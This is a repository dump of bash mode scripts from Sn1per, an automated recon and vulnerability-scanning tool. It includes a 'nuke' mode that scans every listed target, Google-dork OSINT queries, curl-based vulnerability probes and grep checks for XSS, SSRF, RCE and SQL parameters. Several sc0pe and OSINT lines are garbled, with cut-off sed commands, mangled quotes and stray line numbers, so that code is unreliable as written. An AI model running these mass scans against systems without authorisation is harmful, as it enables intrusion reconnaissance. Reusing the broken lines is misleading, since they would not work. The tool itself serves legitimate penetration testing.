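        /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
    fi

    if [[ "$LOOT" = "1" ]]; then
        loot
    fi

    exit
fi
--------------------------------------------------------------------------------
/modes/nuke.sh:
--------------------------------------------------------------------------------
# NUKE MODE #######################################################################################################
# Runs "sniper -t <target> -b" (no -m, so sniper's default mode) for every
# target listed in $FILE, one target per line. No Slack/notification lines are
# written by this mode. Same inputs and helpers as the mass modes.
if [[ "$MODE" = "nuke" ]]; then
    if [[ -z "$FILE" ]]; then
        logo
        echo "You need to specify a list of targets (ie. -f ) to scan."
        exit
    fi
    if [[ "$REPORT" = "1" ]]; then
        # One target per line on fd 3: no glob expansion of scope entries such as
        # "*.example.com", and a sniper child reading stdin cannot eat the list.
        while IFS= read -r -u 3 a || [[ -n "$a" ]]; do
            a="${a%$'\r'}"              # tolerate CRLF target lists
            [[ -z "$a" ]] && continue   # blank lines are not targets
            if [[ -n "$WORKSPACE" ]]; then
                args="$args -w $WORKSPACE"
                WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
                echo -e "$OKBLUE[*] Saving loot to $WORKSPACE_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
                mkdir -p "$WORKSPACE_DIR"/{domains,screenshots,nmap,notes,reports,output} 2> /dev/null
            fi
            args="$args --noreport --noloot"
            TARGET="$a"
            args="$args -t $TARGET -b"
            echo -e "$OKRED "
            echo -e "$OKRED ____"
            echo -e "$OKRED __,-~~/~ \`---."
            echo -e "$OKRED _/_,---( , )"
            echo -e "$OKRED __ / < / ) \___"
            echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -"
            echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/"
            echo -e "$OKRED (_ ( \ ( > \)"
            echo -e "$OKRED \_( _ < >_>'"
            echo -e "$OKRED ~ \`-i' ::>|--\""
            echo -e "$OKRED I;|.|.|"
            echo -e "$OKRED <|i::|i|\`."
            echo -e "$OKRED (\` ^''\`-' ')"
            echo -e "$OKRED --------------------------------------------------------- $RESET"
            echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
            echo -e "$RESET"
            if [[ -n "$WORKSPACE_DIR" ]]; then
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                # $args is an intentionally unquoted option string; "2>&1" has to sit
                # before the pipe for sniper's stderr to reach the log file.
                sniper $args 2>&1 | tee "$WORKSPACE_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            else
                echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
                sniper $args 2>&1 | tee "$LOOT_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
            fi
            args=""
        done 3< "$FILE"
    fi

    if [[ "$LOOT" = "1" ]]; then
        loot
    fi
    exit
fi
--------------------------------------------------------------------------------
/modes/osint_stage_2.sh:
--------------------------------------------------------------------------------
# OSINT STAGE 2
# For domain targets with OSINT enabled: Google-hacking queries via goohak and
# inurlbr dork queries, each gated by its own switch (GOOHAK, INURLBR).
if [[ $SCAN_TYPE == "DOMAIN" ]] && [[ $OSINT == "1" ]]; then
    echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> "$LOOT_DIR/scans/notifications_new.txt"
    if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
        /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
    fi
    if [[ $GOOHAK = "1" ]]; then
        echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
        echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
        echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
        goohak "$TARGET" > /dev/null
    fi
    if [[ $INURLBR = "1" ]]; then
        echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
        echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
        echo -e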
"${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 16 | php /usr/share/sniper/bin/inurlbr.php --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET 17 | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null 18 | rm -f $LOOT_DIR/osint/inurlbr-$TARGET 19 | rm -Rf output/ cookie.txt exploits.conf 20 | fi 21 | GHDB="1" 22 | echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 23 | if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then 24 | /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" 25 | fi 26 | fi 27 | -------------------------------------------------------------------------------- /modes/sc0pe-active-webscan.sh: -------------------------------------------------------------------------------- 1 | for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do 2 | source $file 3 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 4 | if [[ "$SSL" == "true" ]]; then 5 | if [[ -z "$PORT" ]]; then 6 | PORT="443" 7 | fi 8 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null 9 | curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> 
$LOOT_DIR/scans/notifications_new.txt 2> /dev/null 10 | else 11 | if [[ -z "$PORT" ]]; then 12 | PORT="80" 13 | fi 14 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null 15 | curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 16 | fi 17 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null 18 | done -------------------------------------------------------------------------------- /modes/sc0pe-network-scan.sh: -------------------------------------------------------------------------------- 1 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 2 | echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET" 3 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 4 | for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do 5 | source $file 6 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 7 | if [[ "$SEARCH" == "negative" ]]; then 8 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null 9 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo 
"[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 10 | else 11 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null 12 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 13 | fi 14 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null 15 | done 16 | 17 | for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do 18 | source $file 19 | done 20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" -------------------------------------------------------------------------------- /modes/sc0pe-passive-webscan.sh: -------------------------------------------------------------------------------- 1 | for file in `ls $INSTALL_DIR/templates/passive/web/*.sh 2> /dev/null`; do 2 | source $file 3 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 4 | if [[ "$SEARCH" == "negative" ]]; then 5 | if [[ "$SSL" == "true" ]]; then 6 | if [[ -z "$PORT" ]]; then 7 | PORT="443" 8 | fi 9 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null 10 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] 
$VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 11 | else 12 | if [[ -z "$PORT" ]]; then 13 | PORT="80" 14 | fi 15 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null 16 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 17 | fi 18 | else 19 | if [[ "$SSL" == "true" ]]; then 20 | if [[ -z "$PORT" ]]; then 21 | PORT="443" 22 | fi 23 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null 24 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 25 | else 26 | if [[ -z "$PORT" ]]; then 27 | PORT="80" 28 | fi 29 | rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null 30 | cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/ /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: 
$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null 31 | fi 32 | fi 33 | rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null 34 | done 35 | 36 | for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do 37 | source $file 38 | done 39 | -------------------------------------------------------------------------------- /modes/sc0pe.sh: -------------------------------------------------------------------------------- 1 | echo "====================================================================================" | tee $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 2 | CRITICAL_VULNS=$(egrep CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 3 | HIGH_VULNS=$(egrep HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 4 | MEDIUM_VULNS=$(egrep MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 5 | LOW_VULNS=$(egrep LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 6 | INFO_VULNS=$(egrep INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l) 7 | VULN_SCORE=$(($CRITICAL_VULNS*5+$HIGH_VULNS*4+$MEDIUM_VULNS*3+$LOW_VULNS*2+$INFO_VULNS*1)) 8 | echo "•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• " | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 9 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 10 | echo "Critical: $CRITICAL_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 11 | echo "High: $HIGH_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 12 | echo "Medium: $MEDIUM_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 13 | echo "Low: $LOW_VULNS" | tee -a 
$LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 14 | echo "Info: $INFO_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 15 | echo "Score: $VULN_SCORE" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 16 | echo "$VULN_SCORE" 2> /dev/null > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 17 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 18 | egrep -h CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 19 | egrep -h HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 20 | egrep -h MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 21 | egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 22 | egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 23 | echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null 24 | sort -u $LOOT_DIR/vulnerabilities/sc0pe-*.txt > $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null 25 | egrep "CRITICAL" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 26 | egrep "HIGH" 
$LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt 27 | egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 28 | egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt 29 | egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt 30 | WORKSPACE_RISK_CRITCAL=$(cat $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 2> /dev/null) 31 | WORKSPACE_RISK_HIGH=$(cat $LOOT_DIR/vulnerabilities/high_vulns_total.txt 2> /dev/null) 32 | WORKSPACE_RISK_MEDIUM=$(cat $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 2> /dev/null) 33 | WORKSPACE_RISK_LOW=$(cat $LOOT_DIR/vulnerabilities/low_vulns_total.txt 2> /dev/null) 34 | WORKSPACE_RISK_INFO=$(cat $LOOT_DIR/vulnerabilities/info_vulns_total.txt 2> /dev/null) 35 | WORKSPACE_RISK_TOTAL=$(($WORKSPACE_RISK_CRITCAL*5+$WORKSPACE_RISK_HIGH*4+$WORKSPACE_RISK_MEDIUM*3+$WORKSPACE_RISK_LOW*2+$WORKSPACE_RISK_INFO*1)) 36 | echo "$WORKSPACE_RISK_TOTAL" > $LOOT_DIR/vulnerabilities/vuln_score_total.txt 2> /dev/null -------------------------------------------------------------------------------- /modes/static-grep-search.sh: -------------------------------------------------------------------------------- 1 | if [[ $STATIC_GREP_SEARCH == "1" ]]; then 2 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 3 | echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET" 4 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 5 | cat $LOOT_DIR/web/spider-$TARGET.txt 2> 
/dev/null | egrep -iE "$GREP_EXTENSIONS" | tee $LOOT_DIR/web/static-extensions-$TARGET.txt | head -n $GREP_MAX_LINES 6 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 7 | echo -e "$OKRED RUNNING INTERESTING PARAMETERS STATIC ANALYSIS $RESET" 8 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 9 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_PARAMETERS" | tee $LOOT_DIR/web/static-parameters-$TARGET.txt | head -n $GREP_MAX_LINES 10 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 11 | echo -e "$OKRED RUNNING XSS STATIC ANALYSIS $RESET" 12 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 13 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_XSS" | tee $LOOT_DIR/web/static-xss-$TARGET.txt | head -n $GREP_MAX_LINES 14 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 15 | echo -e "$OKRED RUNNING SSRF STATIC ANALYSIS $RESET" 16 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 17 | grep '?' 
$LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSRF" | tee $LOOT_DIR/web/static-ssrf-$TARGET.txt | head -n $GREP_MAX_LINES 18 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 19 | echo -e "$OKRED RUNNING REDIRECT STATIC ANALYSIS $RESET" 20 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 21 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_REDIRECT" | tee $LOOT_DIR/web/static-redirect-$TARGET.txt | head -n $GREP_MAX_LINES 22 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 23 | echo -e "$OKRED RUNNING RCE STATIC ANALYSIS $RESET" 24 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 25 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_RCE" | tee $LOOT_DIR/web/static-rce-$TARGET.txt | head -n $GREP_MAX_LINES 26 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 27 | echo -e "$OKRED RUNNING IDOR STATIC ANALYSIS $RESET" 28 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 29 | grep '?' 
$LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_IDOR" | tee $LOOT_DIR/web/static-idor-$TARGET.txt | head -n $GREP_MAX_LINES 30 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 31 | echo -e "$OKRED RUNNING SQL STATIC ANALYSIS $RESET" 32 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 33 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SQL" | tee $LOOT_DIR/web/static-sql-$TARGET.txt | head -n $GREP_MAX_LINES 34 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 35 | echo -e "$OKRED RUNNING LFI STATIC ANALYSIS $RESET" 36 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 37 | grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_LFI" | tee $LOOT_DIR/web/static-lfi-$TARGET.txt | head -n $GREP_MAX_LINES 38 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 39 | echo -e "$OKRED RUNNING SSTI STATIC ANALYSIS $RESET" 40 | echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" 41 | grep '?' 
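$LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSTI" | tee $LOOT_DIR/web/static-ssti-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DEBUG STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_DEBUG" | tee $LOOT_DIR/web/static-debug-$TARGET.txt | head -n $GREP_MAX_LINES
fi
-------------------------------------------------------------------------------- /modes/web.sh: --------------------------------------------------------------------------------
# WEB MODE #############################################################################################################
#
# Report wrapper for "web" mode.  When REPORT=1 this block optionally switches
# LOOT_DIR to a per-workspace directory, records the task, re-runs sniper with
# --noreport so that its output is captured under $LOOT_DIR/output, and exits.
# It is sourced by the main sniper script and expects MODE, REPORT, TARGET,
# INSTALL_DIR, LOOT_DIR, args and the colour variables (OKBLUE, OKGREEN,
# OKRED, RESET) to be set by the caller.
if [[ "$MODE" = "web" ]]; then
  if [[ "$REPORT" = "1" ]]; then
    if [[ -n "$WORKSPACE" ]]; then
      # WORKSPACE becomes a path component under loot/workspace; reject
      # separators and ".." so a crafted name cannot point LOOT_DIR (and every
      # file written below) outside the loot tree.
      if [[ "$WORKSPACE" == */* || "$WORKSPACE" == *..* ]]; then
        echo -e "$OKRED[!]$RESET Invalid workspace name: $WORKSPACE" >&2
        exit 1
      fi
      args="$args -w $WORKSPACE"
      LOOT_DIR="$INSTALL_DIR/loot/workspace/$WORKSPACE"
      echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
      # A single mkdir -p creates the workspace and all of its sub-directories;
      # errors stay silenced, as before, because the tree usually already exists.
      mkdir -p "$LOOT_DIR"/{domains,screenshots,nmap,notes,reports,scans,output} 2> /dev/null
    fi
    # Record the task and the exact command line before running it.  Variables
    # are quoted so a TARGET or LOOT_DIR containing whitespace or glob
    # characters cannot split into extra arguments or extra file names.
    echo "$TARGET $MODE $(date +"%Y-%m-%d %H:%M")" >> "$LOOT_DIR/scans/tasks.txt" 2> /dev/null
    echo "sniper -t $TARGET -m $MODE --noreport $args" >> "$LOOT_DIR/scans/$TARGET-$MODE.txt"
    # $args is a space-separated option string assembled by the caller and is
    # expanded unquoted on purpose.  2>&1 is placed before the pipe so that
    # sniper's stderr reaches the log too (placed after tee it only redirected
    # tee's own stderr).
    sniper -t "$TARGET" -m "$MODE" --noreport $args 2>&1 | tee "$LOOT_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt"
    exit
  fi
fi
-------------------------------------------------------------------------------- /pro/notepad.html: --------------------------------------------------------------------------------
Notepad App
-------------------------------------------------------------------------------- /sn1per.desktop: --------------------------------------------------------------------------------
[Desktop Entry]
Name=sn1per
Encoding=UTF-8
Exec=bash-wrapper "sudo sniper"
Icon=/usr/share/pixmaps/sn1per.png
StartupNotify=false
Terminal=true
Type=Application
Categories=08-exploitation-tools;02-vulnerability-analysis;01-info-gathering;
X-Kali-Package=sn1per
Comment=
Path=
-------------------------------------------------------------------------------- /sn1per.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/Sn1per/179ac1e783de9ddc5b08e60e3dbd36e2e5399d00/sn1per.png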
